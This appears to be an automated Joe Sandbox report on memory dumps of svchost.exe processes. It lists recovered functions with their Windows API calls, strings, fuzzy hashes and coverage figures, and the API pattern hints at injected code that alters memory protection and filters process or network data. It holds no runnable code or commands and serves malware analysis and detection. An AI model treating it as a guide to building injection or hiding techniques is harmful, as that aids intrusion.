Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: b9727b9b282ca3ce9f8b4db0d914f0ed42e59b60d75f3dfa4141343f09d25bec
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 2C11A523A58A11C1FEA81D68E4DEB6D104B7B753B4F394724BA77073D6CB5AED624200

Function 000002C06FD49658 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000002C06FD49677
SetLastError.KERNEL32 ref: 000002C06FD496FE

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 7802049b4883bf50180bab68563004ea007fb3dc3120036de214afe70cc89c3c
Instruction ID: 3693722a7f68b5cc6c5508534b4320f2c1af10b18381b107ce75eaa9adec4629
Opcode Fuzzy Hash: 7802049b4883bf50180bab68563004ea007fb3dc3120036de214afe70cc89c3c
Instruction Fuzzy Hash: 5C115E20215640C2FE149F36E9CDF2D32DBAB887A0F344624D926077DDDA3AF8628711

Function 000002C06FD43878 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000002C06FD43886
GetCurrentProcess.KERNEL32 ref: 000002C06FD438B4
VirtualProtectEx.KERNEL32 ref: 000002C06FD438D6
GetCurrentProcess.KERNEL32 ref: 000002C06FD438F4
VirtualProtectEx.KERNEL32 ref: 000002C06FD43915

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: d966254c15ad6f14c83360b069619a4203707f18a3e65372d1d926304c325cf8
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: AF113C2A704B40C3FF149F25F449B6EA6AAF748B84F240429DE8947794EF3ED518D700

Function 000002C06F7B84F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002C06F7B8503
_IsNonwritableInCurrentImage.LIBCMT ref: 000002C06F7B8598

Strings

f, xrefs: 000002C06F7B8516
csm, xrefs: 000002C06F7B857E

Memory Dump Source

Source File: 0000001C.00000002.2685755111.000002C06F7B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06F7B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06f7b0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 7b2ad59eace2b2800732036f5c8b333508d53c99af71bd1e99aa5d38f85e7a52
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 6D51C03271A602CAFB14CF55E888F5CB39EF742B98F718124DA1647789EB36CA52C704

Function 000002C06F7B84D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002C06F7B8503
_IsNonwritableInCurrentImage.LIBCMT ref: 000002C06F7B8598

Strings

f, xrefs: 000002C06F7B8516
csm, xrefs: 000002C06F7B857E

Memory Dump Source

Source File: 0000001C.00000002.2685755111.000002C06F7B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06F7B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06f7b0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: b0c9df37878c68bff69ae50c42f7d8455b5c17a70cdd7cdb95f10bb4bb14cc3a
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: 28319171219642CAF714DF51E8C8F1DB7ACFB41B98F258014EE5A47745DB3ACA62C704

Function 000002C06FD414B4 Relevance: 6.3, APIs: 5, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002C06FD414D5
HeapFree.KERNEL32 ref: 000002C06FD414E4
GetProcessHeap.KERNEL32 ref: 000002C06FD414F0
HeapFree.KERNEL32 ref: 000002C06FD414FF
GetProcessHeap.KERNEL32 ref: 000002C06FD4152A

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
Instruction ID: 8278bb6681fc9713d3c2e2e62d9720184b284c2863ec9e88722e9a67c80bf700
Opcode Fuzzy Hash: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
Instruction Fuzzy Hash: EC112E32514B88D2FF559F66E888B1EB7B6F789B84F144029DB9A03B14DF39D061C740

Function 000002C06FD426F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002C06FD427D4
StrCpyW.SHLWAPI ref: 000002C06FD427ED

Strings

\\.\pipe\, xrefs: 000002C06FD427DF

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: d1dfec3b12b4639863af5b933c8899ca69104468bb26d5a4a36b2712b73ad839
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: 4671E432214781C5FF249F29D9C8BAE67DAF744B89F640016DE8983B89DE36D624C740

Function 000002C06FD424DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002C06FD425C3
StrCpyW.SHLWAPI ref: 000002C06FD425DA

Strings

\\.\pipe\, xrefs: 000002C06FD425CE

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: c242f3625c2c74f7b2f663f9e3694b606898c7b24869dc695b286bfd18aa7ffb
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: E951EB32208781C2FE75AF2AD5DCB6E66DBF385784F240025CD8983B99CE37E4258B40

Function 000002C06FD50604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000002C06FD5071B
GetLastError.KERNEL32 ref: 000002C06FD5073D

Strings

U, xrefs: 000002C06FD506C7

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: 59e89f6b7cc1d4c31b428159443c4097e380627219464df22c95132e7175267f
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: A041A372314A41C2FB209F25E48879EB7AAF7887C4F604025EE4D87798DB3DD555CB40

Function 000002C06FD4D6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002C06FD4D6F9
LCMapStringW.KERNEL32 ref: 000002C06FD4D781

Strings

LCMapStringEx, xrefs: 000002C06FD4D6DC, 000002C06FD4D6ED

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: 63f9d0c9a3f435df30d9287ce1e88f8f12ac40a567f3bc051c41d6af0309b307
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: 26110B36608B80C6EB60CF16F48479AB7A6F7C9B90F644126EE8D43B59DF38D4608B00

Function 000002C06FD494A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000002C06FD494E8
RaiseException.KERNEL32 ref: 000002C06FD4952E

Strings

csm, xrefs: 000002C06FD4951B

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: 2a6e0963ccc2ed3bad51216862b3e6897b89d2c3bd5c86574483065d4801315d
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: DC110A32218B8082EF658F15E58475D77EAF788B98F284221DE9D0BB68DF39D565CB00

Function 000002C06FD4D65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002C06FD4D68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000002C06FD4D6A7

Strings

InitializeCriticalSectionEx, xrefs: 000002C06FD4D681

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: dea0be2e1a70f7a07727da35f09e077ea2fd57939fe8e74493f35045073ad64a
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: 0BF08221710B80D2FF059F41F4C8B9D736BBB88B90F685026E95907B54CE7AE9B5C700

Function 000002C06F7BCB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002C06F7BCBC5

Strings

November, xrefs: 000002C06F7BCBA8, 000002C06F7BCBB2
October, xrefs: 000002C06F7BCBBE

Memory Dump Source

Source File: 0000001C.00000002.2685755111.000002C06F7B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06F7B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06f7b0000_svchost.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: 570273e120a3e8c577c3bdb4311871eba2d64fdb46f9ca993bdd388cde319497
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: 08E09221200545D6FA059FD1F4C9BEDE369AB88B44F799021965906356CE3ACAA6D300

Function 000002C06FD4D608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002C06FD4D631
TlsSetValue.KERNEL32 ref: 000002C06FD4D648

Strings

FlsSetValue, xrefs: 000002C06FD4D61E

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: c36fe2a717e5506eddc23664b6460de5bb00a583dffaa4f374ff06a6f5680e55
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: 4BE09261200640D1FF055F50F8CDFAC236BBB88B80F784022D90907355CE3AE875C701

Function 000002C06FD41D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002C06FD41D9B
HeapAlloc.KERNEL32 ref: 000002C06FD41DAA
GetProcessHeap.KERNEL32 ref: 000002C06FD41E1E
HeapFree.KERNEL32 ref: 000002C06FD41E2C

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: b0672fb7c12698f440fe56918fe6ef7d13faa2e811c5ad57e20f256fb271a35c
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: F0218326604B90C2FF128F69E44875EF3E6FB88B94F254120DE8C47B24EF7AD5628700

Function 000002C06FD41274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002C06FD4127A
HeapAlloc.KERNEL32 ref: 000002C06FD41289
GetProcessHeap.KERNEL32 ref: 000002C06FD412A3
HeapAlloc.KERNEL32 ref: 000002C06FD412B4

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: b30e161d627de4a06bec79716b909aaf00c7dc6a08c636e7cef09a7898141e37
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: 62E03972611600C6FF048F72D849B4D36E6EB88B01F588024C90907350DF7E94A9C740

Analysis Process: svchost.exePID: 888, Parent PID: 8080COMMON

Execution Graph

Execution Coverage:	0.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	71
Total number of Limit Nodes:	3

Executed Functions

Function 000002917C3B0346 Relevance: 6.0, APIs: 4, Instructions: 1034
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000002917C3B1006
HeapAlloc.KERNEL32 ref: 000002917C3B1015
GetProcessHeap.KERNEL32 ref: 000002917C3B1028
HeapAlloc.KERNEL32 ref: 000002917C3B1037

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: da3653941ee27b4032445f916b986651388196774474ecb5996340d1f59d089c
Instruction ID: d82bf80160f3ad893f5203789eb3f9aaafa4c5397af4e4370bcb23b2e412be62
Opcode Fuzzy Hash: da3653941ee27b4032445f916b986651388196774474ecb5996340d1f59d089c
Instruction Fuzzy Hash: BFF0FFA261A7C18BE3169BA388152DD7FB0F789F01F89C156C64543392DB2C8499D761

Function 000002917C3B1000 Relevance: 5.0, APIs: 4, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000002917C3B1006
HeapAlloc.KERNEL32 ref: 000002917C3B1015
GetProcessHeap.KERNEL32 ref: 000002917C3B1028
HeapAlloc.KERNEL32 ref: 000002917C3B1037

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 3942458b2e602a87a53f3a6f36558e5fd963b0420189fb76057d3a0940dc335f
Instruction ID: 5ebbc0a9cb69abeada060dae818d8b79bb16ba6e8652a291800e6584ebea83c1
Opcode Fuzzy Hash: 3942458b2e602a87a53f3a6f36558e5fd963b0420189fb76057d3a0940dc335f
Instruction Fuzzy Hash: 40E0EDB17616028AF758ABA7D8092DDB6B1FB88B11F488024C90907350DF3C84A5C660

Function 000002917C3B3458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 000002917C3B347A
PathFindFileNameW.SHLWAPI ref: 000002917C3B3489

Part of subcall function 000002917C3B3930: StrCmpNIW.SHLWAPI ref: 000002917C3B3948

Part of subcall function 000002917C3B3878: GetModuleHandleW.KERNEL32 ref: 000002917C3B3886
Part of subcall function 000002917C3B3878: GetCurrentProcess.KERNEL32 ref: 000002917C3B38B4
Part of subcall function 000002917C3B3878: VirtualProtectEx.KERNEL32 ref: 000002917C3B38D6
Part of subcall function 000002917C3B3878: GetCurrentProcess.KERNEL32 ref: 000002917C3B38F4
Part of subcall function 000002917C3B3878: VirtualProtectEx.KERNEL32 ref: 000002917C3B3915

CreateThread.KERNEL32 ref: 000002917C3B34D7

Part of subcall function 000002917C3B1EB4: GetCurrentThread.KERNEL32 ref: 000002917C3B1EBF

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: 55d1877c20bbdf6a5ab53f9aa037a4b17a14155a04b4f2c9b9b1824979cac760
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: A8115B7171062382FBB5AFE3F84F3E9E290A754304F4441259A0A85BD4EF7DC0648670

Function 000002917C3B1C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000002917C3B1650: GetProcessHeap.KERNEL32 ref: 000002917C3B165B
Part of subcall function 000002917C3B1650: HeapAlloc.KERNEL32 ref: 000002917C3B166A
Part of subcall function 000002917C3B1650: RegOpenKeyExW.ADVAPI32 ref: 000002917C3B16DA
Part of subcall function 000002917C3B1650: RegOpenKeyExW.ADVAPI32 ref: 000002917C3B1707
Part of subcall function 000002917C3B1650: RegCloseKey.ADVAPI32 ref: 000002917C3B1721
Part of subcall function 000002917C3B1650: RegOpenKeyExW.ADVAPI32 ref: 000002917C3B1741
Part of subcall function 000002917C3B1650: RegCloseKey.ADVAPI32 ref: 000002917C3B175C
Part of subcall function 000002917C3B1650: RegOpenKeyExW.ADVAPI32 ref: 000002917C3B177C
Part of subcall function 000002917C3B1650: RegCloseKey.ADVAPI32 ref: 000002917C3B1797
Part of subcall function 000002917C3B1650: RegOpenKeyExW.ADVAPI32 ref: 000002917C3B17B7
Part of subcall function 000002917C3B1650: RegCloseKey.ADVAPI32 ref: 000002917C3B17D2
Part of subcall function 000002917C3B1650: RegOpenKeyExW.ADVAPI32 ref: 000002917C3B17F2

Sleep.KERNEL32 ref: 000002917C3B1C43
SleepEx.KERNELBASE ref: 000002917C3B1C49

Part of subcall function 000002917C3B1650: RegCloseKey.ADVAPI32 ref: 000002917C3B180D
Part of subcall function 000002917C3B1650: RegOpenKeyExW.ADVAPI32 ref: 000002917C3B182D
Part of subcall function 000002917C3B1650: RegCloseKey.ADVAPI32 ref: 000002917C3B1848
Part of subcall function 000002917C3B1650: RegOpenKeyExW.ADVAPI32 ref: 000002917C3B1868
Part of subcall function 000002917C3B1650: RegCloseKey.ADVAPI32 ref: 000002917C3B1883
Part of subcall function 000002917C3B1650: RegOpenKeyExW.ADVAPI32 ref: 000002917C3B18A3
Part of subcall function 000002917C3B1650: RegCloseKey.ADVAPI32 ref: 000002917C3B18BE
Part of subcall function 000002917C3B1650: RegCloseKey.ADVAPI32 ref: 000002917C3B18C8

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: d2daf431f9721c5445636364f6a2fb3d992cb93bad0da0b14cd0ac50400a6c82
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: 2B31A066300A0791FF50AFA7D66F3EEB2A6AB44BD0F145425DE09877D5DF24C4708270

Function 000002917C3B3930 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpNIW.SHLWAPI ref: 000002917C3B3948

Strings

dialer, xrefs: 000002917C3B3941

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID:
String ID: dialer
API String ID: 0-3528709123
Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction ID: c4f045ce32626fce012b2dd8539fcd99e1a90f8776fc0020d436b65ce71f6606
Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction Fuzzy Hash: 01D05E7031121B86FFA49FE3C88A3E8A350AB14704F4480208A0102754DB1C89AD8A20

Function 000002917C382908 Relevance: 1.7, APIs: 1, Instructions: 186
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 000002917C382A31

Memory Dump Source

Source File: 0000001D.00000002.2684148059.000002917C380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c380000_svchost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: 3d314fe80a3a6cadf4f42031064e5a7f911bb51db1a48455d98cfe6fe171df36
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: E361216274225387FA68CFA6D449BAEF3D1FB44B94F448021DE1907785DB39E862C730

Function 000002917C3BB860 Relevance: 1.3, APIs: 1, Instructions: 36
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapAlloc.KERNEL32 ref: 000002917C3BB8B5

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
Instruction ID: 44e2fb32a20c8c2bbf20a73fea9e1c1299ef29b24eb7ff1bd85e960af2578a7e
Opcode Fuzzy Hash: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
Instruction Fuzzy Hash: 0EF01D9470168785FE556FE7D85B3D592D06F84B48F5C54348D4ACA3D1DF1CC4654238

Function 000002917C97B860 Relevance: 1.3, APIs: 1, Instructions: 36
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapAlloc.KERNEL32 ref: 000002917C97B8B5

Memory Dump Source

Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
Instruction ID: ee34f54790fca98c050d784f4ee02de5dbaa68851153e159f7c50544abe8f5f7
Opcode Fuzzy Hash: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
Instruction Fuzzy Hash: 8DF0309570360785FED5ABE3955D3F5D2806FA7B40F5C44B08D0A863D1EF2CC5654210

Non-executed Functions

Function 000002917C3B2CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 000002917C3B2D80
lstrlenW.KERNEL32 ref: 000002917C3B2FBA

Part of subcall function 000002917C3B1A14: OpenProcess.KERNEL32 ref: 000002917C3B1A3A
Part of subcall function 000002917C3B1A14: K32GetModuleFileNameExW.KERNEL32 ref: 000002917C3B1A58
Part of subcall function 000002917C3B1A14: PathFindFileNameW.SHLWAPI ref: 000002917C3B1A67
Part of subcall function 000002917C3B1A14: lstrlenW.KERNEL32 ref: 000002917C3B1A73
Part of subcall function 000002917C3B1A14: StrCpyW.SHLWAPI ref: 000002917C3B1A86
Part of subcall function 000002917C3B1A14: CloseHandle.KERNEL32 ref: 000002917C3B1A94

GetProcAddress.KERNEL32 ref: 000002917C3B2D95

Part of subcall function 000002917C3B1554: StrCmpIW.SHLWAPI ref: 000002917C3B1585

Part of subcall function 000002917C3B3930: StrCmpNIW.SHLWAPI ref: 000002917C3B3948

StrCmpNIW.SHLWAPI ref: 000002917C3B2DD8
lstrlenW.KERNEL32 ref: 000002917C3B2F00

Strings

\Device\Nsi, xrefs: 000002917C3B2DCB
